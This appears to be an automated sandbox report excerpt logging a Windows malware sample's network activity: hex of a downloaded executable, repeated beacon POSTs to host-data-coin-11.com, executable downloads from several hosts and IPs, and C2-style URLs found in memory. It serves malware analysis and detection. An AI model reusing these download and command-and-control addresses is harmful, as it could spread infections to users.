00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 31 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 59 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 13 1e 01 00 00 10 00 00 00 20 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 22 3f 00 00 00 30 01 00 00 40 00 00 00 24 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 fe 0b 00 00 70 01 00 00 9e 0b 00 00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 dd 6e 02 00 70 0d 00 00 ce 00 00 00 02 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 09:44:59 GMTContent-Type: application/x-msdos-programContent-Length: 557664Connection: closeLast-Modified: Thu, 13 Jan 2022 19:20:04 GMTETag: "88260-5d57b92d7ebed"Accept-Ranges: bytesData Raw: 4d 5a e2 15 17 e8 ec 6f ac 01 a3 67 88 27 b0 3a 07 28 33 98 08 dd 33 32 a2 e3 d0 db df 66 f6 e9 c8 9b f0 ce 43 27 42 7b 62 19 d6 e4 19 09 05 f6 16 cd 2b 9a c3 52 c6 c7 98 88 64 3a 00 01 00 00 0b 51 d1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 d6 ad 35 ab 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 24 03 00 00 2a 03 00 00 00 00 00 00 b0 06 00 00 20 00 00 00 60 03 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 30 08 00 00 04 00 00 1c 40 09 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 70 03 00 e4 01 00 00 00 80 03 00 50 29 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 69 64 61 74 61 00 00 00 60 03 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 2e 70 64 61 74 61 00 00 00 10 00 00 00 70 03 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 29 03 00 00 80 03 00 30 06 03 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 61 00 00 80 01 00 00 b0 06 00 fc 78 01 00 00 0e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jsplktel.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 281Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ivfhujym.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 312Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nipgcts.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 151Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bxide.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 223Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rgxie.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 315Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jnolpkdknj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 122Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://stbgsgw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 239Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uknnqg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 290Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /files/9030_1641816409_7037.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://otraxus.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 166Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qsvubjh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 279Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wwmessepf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 348Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nlxvu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 154Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xjjyulxcfs.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 185Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /install5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unicupload.top
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jdecaoxkel.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 252Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uhcpfe.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 322Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qwfybhxm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 176Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://odyvlsasq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 351Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://eahqahqv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 213Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://daixhajgka.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 248Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cghrkunn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 240Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pfwxavhis.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 275Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /6.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.7.214.171:8080
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ebgfrfm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 130Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://covjb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 132Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rguskwyq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 184Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vpvxxeoni.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 169Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://arpfh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 208Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nnyntvsvo.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 238Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sopssp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 334Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vhclpnkvya.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 267Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lphbdueqjj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 140Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kakjdonis.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 184Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gpnorygxw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 286Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ackvfel.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 183Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jrhwfdx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 194Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yrgforv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 361Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hwivor.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 268Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wpctxossq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 203Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kkrgipwnic.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 186Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jqlty.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 246Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uqclrrn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 301Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://khnjbia.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 234Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gtapfy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 122Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xokmpq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 235Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nbjhuloh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 225Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cifusjcgu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 257Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jfioua.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 207Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://usyqjbp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 111Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /files/8474_1641976243_3082.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lepql.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 228Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://txdwk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 363Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /9.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: a0621298.xsph.ru
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://phiqqvf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 308Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tmtuscxant.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 262Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jpiimxqwms.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 234Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lsmlx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 134Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://etxdwvf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 257Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lnxul.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 354Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://krijk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 325Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://brqduyej.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 201Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://imxgr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 265Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /files/7729_1642101604_1835.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://koqghysihf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 179Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kiocvqo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 369Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /7.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: a0621298.xsph.ru
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kcgghyab.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 258Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://smrwgxji.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 310Host: host-data-coin-11.com
                          Source: global trafficTCP traffic: 192.168.2.6:49716 -> 185.7.214.171:8080
                          Source: global trafficTCP traffic: 192.168.2.6:49764 -> 86.107.197.138:38133
                          Source: unknownNetwork traffic detected: IP country count 10
                          Source: global trafficTCP traffic: 192.168.2.6:49726 -> 40.93.207.0:25
                          Source: A7F0.exe, 0000001F.00000002.650660654.0000000002FEE000.00000004.00000020.sdmpString found in binary or memory: http://178.62.113.205/capibar
                          Source: A7F0.exe, 0000001F.00000002.650660654.0000000002FEE000.00000004.00000020.sdmpString found in binary or memory: http://185.163.204.22/capibar
                          Source: A7F0.exe, 0000001F.00000002.663447293.00000000051C0000.00000004.00000001.sdmp, A7F0.exe, 0000001F.00000002.663539364.00000000051D4000.00000004.00000001.sdmpString found in binary or memory: http://185.163.204.24/
                          Source: A7F0.exe, 0000001F.00000002.663447293.00000000051C0000.00000004.00000001.sdmpString found in binary or memory: http://185.163.204.24//l/f/N2z-VH4BZ2GIX1a33Fax/53d4f78085a60d100b5580840cacffadb56a356d
                          Source: A7F0.exe, 0000001F.00000002.663447293.00000000051C0000.00000004.00000001.sdmpString found in binary or memory: http://185.163.204.24//l/f/N2z-VH4BZ2GIX1a33Fax/74acab80c259fbd3afe9b19dbd62861e1ddfe5b8
                          Source: A7F0.exe, 0000001F.00000002.663447293.00000000051C0000.00000004.00000001.sdmpString found in binary or memory: http://185.163.204.24//l/f/N2z-VH4BZ2GIX1a33Fax/74acab80c259fbd3afe9b19dbd62861e1ddfe5b841
                          Source: A7F0.exe, 0000001F.00000002.663447293.00000000051C0000.00000004.00000001.sdmpString found in binary or memory: http://185.163.204.24//l/f/N2z-VH4BZ2GIX1a33Fax/74acab80c259fbd3afe9b19dbd62861e1ddfe5b8v
                          Source: A7F0.exe, 0000001F.00000002.663447293.00000000051C0000.00000004.00000001.sdmpString found in binary or memory: http://185.163.204.24/0
